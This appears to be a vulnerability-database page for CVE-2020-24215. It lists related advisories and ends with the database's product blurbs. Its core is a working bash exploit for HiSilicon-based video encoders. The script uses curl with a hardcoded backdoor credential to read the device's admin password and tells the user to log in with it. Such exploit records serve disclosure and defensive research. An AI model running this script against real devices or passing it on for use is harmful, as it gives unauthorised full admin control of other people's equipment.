| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2020-24215 | 14 Nov 202406:07 | – | circl | |
| CVE-2020-24215 | 6 Oct 202013:00 | – | cve | |
| CVE-2020-24215 | 6 Oct 202013:00 | – | cvelist | |
| CVE-2020-24215 | 6 Oct 202013:15 | – | nvd | |
| HiSilicon Video Encoder Backdoor Password | 19 Oct 202000:00 | – | packetstorm | |
| Hardcoded credentials | 6 Oct 202013:15 | – | prion | |
| IPTV encoder devices contain multiple vulnerabilities | 15 Sep 202000:00 | – | cert |
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - full admin access via backdoor password
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24215
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 1 ]
then
echo "Usage: $0 <server>[:<port>]"
exit 1
fi
printf "retrieving the password... "
password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \
grep -oP '(?<=<html_password>).*?(?=</html_password>)')
ret=$?
if [ "$ret" -eq 0 ]
then
echo "the password is '$password'"
echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'"
else
echo "ERROR: curl returned $ret"
fiData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation